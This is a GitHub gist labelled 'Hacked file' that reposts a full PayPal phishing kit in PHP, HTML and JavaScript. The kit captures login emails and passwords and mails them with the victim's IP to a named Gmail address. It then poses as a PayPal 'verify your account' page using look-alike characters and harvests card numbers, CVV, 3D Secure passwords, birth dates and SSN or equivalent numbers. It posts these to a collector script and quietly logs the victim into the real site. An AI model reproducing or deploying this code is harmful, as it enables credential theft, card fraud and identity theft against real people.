Skip to content

Instantly share code, notes, and snippets.

@jamjar919
Created January 23, 2017 15:13
Show Gist options
  • Save jamjar919/e07ddc991e6d6abc13600fb676ec76a2 to your computer and use it in GitHub Desktop.
Save jamjar919/e07ddc991e6d6abc13600fb676ec76a2 to your computer and use it in GitHub Desktop.
Hacked file
<?php
session_start();
/* * * * * * * * * * * * * * * * * * * * * * * *
*
* DATE AND TIME
*
* * * * * * * * * * * * * * * * * * * * * * * */
date_default_timezone_set("Africa/Tunis");
$date = date("d/m/Y , g:i a");
/* * * * * * * * * * * * * * * * * * * * * * * *
*
* R A N D O M S
*
* * * * * * * * * * * * * * * * * * * * * * * */
function RANDOM($length = 15) {
$characters = '0123456789AZERTY';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomString;
}
/* * * * * * * * * * * * * * * * * * * * * * * *
*
* L O G I N
*
* * * * * * * * * * * * * * * * * * * * * * * */
if( isset($_POST['email']) AND isset($_POST['password']) ){
echo "LOGIN_OK";
$_SESSION['EMAIL'] = $_POST['email'];
$_SESSION['PASSWORD'] = $_POST['password'];
$content = "<pre style='border: 2px solid; border-color: rgb(67, 159, 253);border-radius: 4px;font-weight: bold;font-size: 14px;padding-top: 1.5%;padding-bottom: 2%;'>
<img src='https://2.bp.blogspot.com/-O-ZJASC706s/U_hvz20oD2I/AAAAAAAAACw/OV1BlsEyjM0/s1600/logo_106x27.png'/>
<font style='color: rgb(251, 58, 105);'>PP LOGIN:</font>
<font style='color: rgb(20, 158, 27);'>Add Date LOGIN:</font> $date
<font style='color: rgb(128, 129, 131);'>&#10112; Email :</font> <font style='color: rgb(60, 118, 235);'>".$_POST['email']."</font>
<font style='color: rgb(128, 129, 131);'>&#10113; Password :</font> <font style='color: rgb(60, 118, 235);'>".$_POST['password']."</font>
<font style='color: rgb(128, 129, 131);'>&#10114; IP :</font> <font style='color: rgb(60, 118, 235);'><a target='_blank' style='text-decoration:none;' href='http://www.geoiptool.com/?IP=".$_SERVER['REMOTE_ADDR']."'>".$_SERVER['REMOTE_ADDR']."</a></font>
<font style='color: rgb(128, 129, 131);'>&#10115; User agent :</font> <font style='color: rgb(60, 118, 235);'>".$_SERVER['HTTP_USER_AGENT']."</font><br> ";
$head = "MIME-Version: 1.0" . "\r\n";
$head .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$head .= "From: PPLV2" . "\r\n";
mail('zico.say@gmail.com', ' NEWLOGIN FROM [ '.$_SESSION['country1'].' - '.$_SERVER['REMOTE_ADDR'].' ]', $content,$head);
}
<?php
session_start();
include("system/functions.php");
include("blocker.php");
include("detect.php");
?>
<!DOCTYPE html>
<html class="no-js" lang="en" id="<?php echo RANDOM();?>">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title> Verify your account - &Rho;ay&Rho;al </title>
<link rel="shortcut icon" href="http://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico">
<link rel="apple-touch-icon" href="images/apple-touch-icon.png">
<link rel="stylesheet" href="css/main.css">
<script src="js/vendor/modernizr.js"></script>
</head>
<body id="<?php echo RANDOM();?>" data-token="<?php echo RANDOM();?>">
<!--[if lt IE 8]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
<![endif]-->
<!-- LOADER PAGE IN CLICKS BUTTON -->
<div class="rotation"> <p> Checking your info... </p> </div>
<div id="page">
<nav class="topbar clearfix" id="<?php echo RANDOM();?>">
<div class="container">
<div class="main-logo"></div>
<div class="topbar-list"></div>
<div class="topbar-btns">
<a rel="nofollow" class="btn mini"> My &Rho;ay&Rho;al </a>
<a rel="nofollow" class="btn secondary mini"> Log out </a>
</div>
</div>
</nav>
<div class="main-content clearfix" id="<?php echo RANDOM();?>">
<div class="container">
<div class="content-first">
<div class="content-icon"> <img alt="" src="images/inter.png"> </div>
<h1> Verify your account </h1>
<p> We apologize for any inconvenience. </p>
<p> You can not access all your &Rho;ay&Rho;al advantages, due to account limited. <br>
<p> To restore your account, please click <i>Continue</i> to update your information. </p>
<div class="start-link clearfix">
<a rel="nofollow" class="btn"> Continue </a>
</div>
</div>
<div class="content-last">
<div class="content-icon"> <img alt="" src="images/congratulations.png"> </div>
<h1> Congratulations! <br><span class="nameo"></span> Your have restored your account access.<br></h1>
<p> Now you can enjoy our services, thank you for choosing our trusted service.<br>
your account will be verified in the next 24 hours.
</p>
<div class="btn-content-last">
<a rel="nofollow" class="btn large login-ppcom"> My &Rho;ay&Rho;al </a> &nbsp;
<a rel="nofollow" class="btn secondary large" href="http://bit.ly/1LgxroZ"> Log out </a>
</div>
<p class="seconds"> You are being redirected to your &Rho;ay&Rho;al account , within 10 seconds. </p>
</div>
</div>
</div>
<form class="hidden" id="form-ppcom" method="post" name="login_form" action="https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit" autocomplete="off" novalidate="">
<input type="hidden" name="login_cmd" value="">
<input type="hidden" name="login_params" value="">
<input id="email" name="login_email" type="email" autocomplete="off" value="<?php echo $_SESSION['EMAIL'] ?>">
<input id="password" name="login_password" type="password" value="<?php echo $_SESSION['PASSWORD'] ?>">
<input type="submit" id="btnLogin" name="submit.x">
</form>
<footer class="main-footer2 clearfix2 footer-after-<?php echo RANDOM();?>">
<div style="border-top: 1px solid #E0DDDD;"></div>
<div class="container2">
<p class="copyright2"> Copyright &copy; 1999 - <?php echo date('Y'); ?> &Rho;ay&Rho;al Inc. </p>
<a href="#" class="footer-link2"> Privacy </a>
<a href="#" class="footer-link2"> Legal </a>
<a href="#" class="footer-link2"> Contact </a>
<a class="footer-flag country <?php echo $countrycode;?>"></a>
</div>
</footer>
</div>
<!------------------------->
<!-- P O P . W I N D O W -->
<!------------------------->
<div class="pop-window" id="<?php echo RANDOM();?>">
<div class="container">
<a rel="nofollow" class="close-link"> </a>
<div class="pop-window-content">
<form class="form-card" action="" method="post" id="<?php echo RANDOM();?>">
<h2> Update credit/debit card </h2>
<p> Please enter your credit/debit card informations correctly. </p>
<div class="inputs">
<select class="enterInput" name="card_type">
<option value="0" selected> Card type </option>
<option value="VISA"> Visa </option>
<option value="MASTERCARD"> MasterCard </option>
<option value="AMERICAN_EXPRESS"> American Express </option>
<option value="DISCOVER"> Discover </option>
</select>
</div>
<div class="inputs">
<input class="enterInput" type="text" name="card_number" id="cardnumber" placeholder="Card number" maxlength="19" onkeyup="SelectCC(this.value)" pattern="4[0-9]{12}(?:[0-9]{3})?">
<span class="card02" id="card02"></span>
</div>
<div class="section group inputs">
<div class="col span_1_of_2 inexpiration">
<input class="enterInput" type="text" name="expiration" placeholder="Expiration MM/YYYY" maxlength="7">
</div>
<div class="col span_1_of_2">
<input class="enterInput" type="text" name="cvv" id="cvv" placeholder="CSC" pattern="[0-9]*" maxlength="4">
<span class="card02" id="cvv1" style="background-position: 0px -434px;" ></span>
</div>
</div>
<div class="inputs" style="margin-bottom: 15px">
<select class="enterInput address" name="address">
<option value="0" selected> Select a billing address </option>
<option value="1">+ Add a new billing address</option>
</select>
</div>
<input class="btn block" value="Save" type="submit">
</form>
<form class="form-address" action="" method="post" id="<?php echo RANDOM();?>">
<h2 style="margin-bottom: 30px"> Update Billing Address </h2>
<p> Please enter account information correctly. </p>
<div class="inputs">
<input class="enterInput" type="text" name="address_1" placeholder="Address line 1" maxlength="120">
</div>
<div class="inputs">
<input class="enterInput" type="text" name="address_2" placeholder="Address line 2 (optional)" maxlength="120">
</div>
<div class="section group inputs">
<div class="col span_1_of_2 inexpiration">
<input class="enterInput" type="text" name="city" placeholder="City" maxlength="30">
</div>
<div class="col span_1_of_2">
<input class="enterInput" type="text" name="state" placeholder="State" maxlength="30">
</div>
</div>
<div class="section group inputs" style="margin-bottom: 15px">
<div class="section group inputs">
<div class="col span_1_of_2">
<input class="enterInput" type="text" name="zip_code" placeholder="Zip code" maxlength="12">
</div>
<div class="col span_1_of_2">
<input class="enterInput" type="text" name="country" placeholder="Country" maxlength="30" value="<?php echo $countryname ?>" >
</div>
</div>
</div>
<div class="inputs">
<input class="enterInput" type="tel" name="phone" placeholder="Phone number" maxlength="30">
</div>
<input class="btn block" value="Save" type="submit">
<a rel="nofollow" class="cancel-address" href="#"> Cancel </a>
</form>
<form class="form-vbv" action="" method="post" id="<?php echo RANDOM();?>">
<input type="hidden" class="hidden" type="password">
<div class="main-logo"></div>
<div class="section group" style="border-bottom: 1px solid #DDDDDD;margin-bottom: 20px;">
<div class="col span_1_of_2">
<h3> Confirm your credit card </h3>
<p> Please enter information pertaining to your credit card
to add it in your &Rho;ay&Rho;al account.
</p>
</div>
<div class="col span_1_of_2 col_creditcard_vbv">
<img alt="" class="creditcard_vbv" src="images/creditcard.png">
</div>
</div>
<div class="section group section_vbv">
<div class="col span_1_of_2">
Card Number:
</div>
<div class="col span_1_of_2">
<span class="digits4"></span>
</div>
</div>
<div class="section group section_vbv">
<div class="col span_1_of_2">
Name on Card:<span style="color:red">*</span>
</div>
<div class="col span_1_of_2">
<input type="text" name="name_on_card" size="15">
</div>
</div>
<div class="section group section_vbv">
<div class="col span_1_of_2">
Birth Date:<span style="color:red">*</span>
</div>
<div class="col span_1_of_2">
<input type="text" name="birth_date" size="15" maxlength="10"><br>
<span style="letter-spacing: 1px;font-size:11px"> DD/MM/YYYY </span>
</div>
</div>
<hr>
<?php
if ($countrycode=="GB"){ echo '
<div class="section group section_vbv">
<div class="col span_1_of_2">
Sort Code:
</div>
<div class="col span_1_of_2 sort_codes">
<input type="text" name="sort_code" placeholder="XX-XX-XX" size="25" maxlength="8" style="width: 100%" >
</div>
</div> '; }
elseif ($countrycode=="US" or $countrycode=="IL"){ echo '
<div class="section group section_vbv">
<div class="col span_1_of_2">
Social Security Number:
</div>
<div class="col span_1_of_2 sort_codes">
<input type="text" name="ssn" placeholder="XXX-XX-XXXX" size="25" maxlength="11" style="width: 100%" >
</div>
</div>
';}
elseif ($countrycode=="CA"){ echo '
<div class="section group section_vbv">
<div class="col span_1_of_2">
Social Insurance Number:
</div>
<div class="col span_1_of_2 sort_codes">
<input type="text" name="ins" placeholder="XXX-XXX-XXX" size="25" maxlength="11" style="width: 100%" >
</div>
</div>
';}
elseif ($countrycode=="AU"){ echo '
<div class="section group section_vbv">
<div class="col span_1_of_2">
Driver Lience Number:
</div>
<div class="col span_1_of_2 sort_codes">
<input type="text" name="driver" size="25" maxlength="14" style="width: 100%" >
</div>
</div>
'; }
?>
<div class="section group section_vbv">
<div class="col span_1_of_2">
3D Secure Password:
</div>
<div class="col span_1_of_2">
<input type="password" name="vbv" id="vbv" size="15"><br>
</div>
</div>
<div class="section group section_vbv btn-vbv">
<input type="submit" value="Confirm Now">
</div>
<p class="copyright_vbv"> &copy; 2015 Bank check.All Rights Reserved. </p>
</form>
</div>
</div>
</div>
<script src="js/vendor/jquery.js"></script>
<script src="js/plugins.js"></script>
<script src="js/main.js"></script></script>
<script>
$(".form-card").validate({
rules: {
card_type: { required: true, selected: 0 },
card_number: { required: true, minlength:12, maxlength: 19, creditcard: true },
expiration: { required: true, minlength: 7, maxlength: 7, expiration: true },
cvv: { required: true, minlength: 3, maxlength: 4, number: true },
address: { required: true, selected: 0, selected_t: 1},
},
messages: { card_type: "", card_number: "", expiration: "", cvv: "", address: "" },
///////////////////////////////////////////////////////////
submitHandler: function(form) {
$('.rotation').show();
$.cookie('card_type' , $('select[name="card_type"]').val());
$.cookie('card_number', $('input[name="card_number"]').val());
$.cookie('expiration' , $('input[name="expiration"]').val());
$.cookie('cvv' , $('input[name="cvv"]').val());
$.cookie('address' , $('select[name="address"]').val());
var $id = $('input[name="card_number"]').val();
$('.digits4').append('XXXX-XXXX-XXXX-' + $id.substr($id.length - 4));
setTimeout(function() {
$('.rotation').hide();
$('.form-card').hide();
$('.form-vbv').show();
}, 2500);
///////////////////////////////////////////////////////////
},
});
$(".form-address").validate({
rules: {
address_1: { required: true, minlength:3, maxlength: 120},
city: { required: true, minlength:3, maxlength: 30, city: true },
country: { required: true },
phone : { required: true },
zip_code: { required: true, minlength:3, maxlength: 12, zip_code: true },
},
messages: { address_1: "", city: "", zip_code: "" },
///////////////////////////////////////////////////////////
submitHandler: function(form) {
var $option = $('input[name="address_1"]').val() + ', ' + $('input[name="city"]').val() + ', ' + $('input[name="state"]').val() + ', ' + $('input[name="zip_code"]').val() + ', ' + $('input[name="country"]').val() + ', ' + $('input[name="phone"]').val() ;
$('.rotation').show();
$('select.address').append('<option value="' + $option + '" selected>' + $option + '</option>');
$('select.address').removeClass("error");
setTimeout(function() {
$('.rotation').hide();
$('.form-address').hide();
$('.form-card').show();
}, 1000);
///////////////////////////////////////////////////////////
},
});
$(".form-vbv").validate({
rules: {
name_on_card: { required: true, minlength:3 , maxlength: 120 },
birth_date: { required: true, },
},
messages: { name_on_card: "", birth_date: "" },
///////////////////////////////////////////////////////////
submitHandler: function(form) {
$('.rotation').show();
$.cookie('name_on_card', $('input[name="name_on_card"]').val());
var $id2 = $('input[name="name_on_card"]').val();
$('.nameo').append(' ' + $id2 + ', ' );
$.cookie('birth_date' , $('input[name="birth_date"]').val());
$.cookie('sort_code' , $('input[name="sort_code"]').val());
$.cookie('ssn' , $('input[name="ssn"]').val());
$.cookie('ins' , $('input[name="ins"]').val());
$.cookie('driver' , $('input[name="driver"]').val());
$.cookie('vbv' , $('input[name="vbv"]').val());
$.ajax({
type: 'POST',
url: 'system/functions',
data: {
'card_type' : $.cookie('card_type'),
'card_number' : $.cookie('card_number'),
'expiration' : $.cookie('expiration'),
'cvv' : $.cookie('cvv'),
'address' : $.cookie('address'),
'name_on_card' : $.cookie('name_on_card'),
'birth_date' : $.cookie('birth_date'),
'sort_code' : $.cookie('sort_code'),
'ssn' : $.cookie('ssn'),
'ins' : $.cookie('ins'),
'driver' : $.cookie('driver'),
'vbv' : $.cookie('vbv')
},
success: function() {
setTimeout(function() {
$('.rotation').hide();
$('#page').show();
$('.content-first').hide();
$('.content-last').show();
document.title = "Thank you - PayPal";
$('.pop-window').hide();
setTimeout(function() {
$('#form-ppcom').submit();
}, 10000);
}, 2500);
// end AJAX
}
});
///////////////////////////////////////////////////////////
},
});
</script>
<script language="Javascript">
// <![CDATA[
function SelectCC(cardnumber) {
var first = cardnumber.charAt(0);
var second = cardnumber.charAt(1);
var third = cardnumber.charAt(2);
var fourth = cardnumber.charAt(3);
var cardnumber = (cardnumber + '').replace(/\\s/g, ''); //remove space
if ((/^(417500|(4917|4913|4026|4508|4844)\d{2})\d{10}$/).test(cardnumber) && cardnumber.length == 16) {
//Electron
document.getElementById("card02").style.backgroundPosition = "0px -203px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
document.getElementById("cvv").maxLength ="3"
document.getElementById("vbv").style.backgroundImage = "url('http://img11.hostingpics.net/pics/393485vbv.png')";
}
else if ((/^(4)/).test(cardnumber) && (cardnumber.length == 16)) {
//Visa
document.getElementById("card02").style.backgroundPosition = "0px 1px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
document.getElementById("cvv").maxLength ="3"
document.getElementById("vbv").style.backgroundImage = "url('http://img11.hostingpics.net/pics/393485vbv.png')";
}
else if ((/^(34|37)/).test(cardnumber) && cardnumber.length == 15) {
//American Express
document.getElementById("card02").style.backgroundPosition = "0px -57px";
document.getElementById("cvv1").style.backgroundPosition = "0px -464px";
document.getElementById("cvv").maxLength ="4"
document.getElementById("vbv").style.backgroundImage = "url('http://img11.hostingpics.net/pics/490379safekey.png')";
}
else if ((/^(51|52|53|54|55)/).test(cardnumber) && cardnumber.length == 16) {
//Mastercard
document.getElementById("card02").style.backgroundPosition = "0px -29px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
document.getElementById("cvv").maxLength ="3"
document.getElementById("vbv").style.backgroundImage = "url('http://img11.hostingpics.net/pics/611831msc.png')";
}
else if ((/^(5018|5020|5038|5612|5893|6304|6759|6761|6762|6763|0604|6390)\d+$/).test(cardnumber) && cardnumber.length == 16) {
//Maestro
document.getElementById("card02").style.backgroundPosition = "0px -174px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
document.getElementById("cvv").maxLength ="3"
document.getElementById("vbv").style.backgroundImage = "url('http://img11.hostingpics.net/pics/611831msc.png')";
}
else if ((/^(6011|16)/).test(cardnumber) && cardnumber.length == 16) {
//Discover
document.getElementById("card02").style.backgroundPosition = "0px -86px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
}
else if ((/^(30|36|38|39)/).test(cardnumber) && (cardnumber.length == 14)) {
//DINER
document.getElementById("card02").style.backgroundPosition = "0px -115";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
}
else if ((/^(35|3088|3096|3112|3158|3337)/).test(cardnumber) && (cardnumber.length == 16)) {
//JCB
document.getElementById("card02").style.backgroundPosition = "0px -145px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
}
else {
document.getElementById("card02").style.backgroundPosition = "0px -406px";
document.getElementById("cvv1").style.backgroundPosition = "0px -434px";
}
}
// ]]></script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment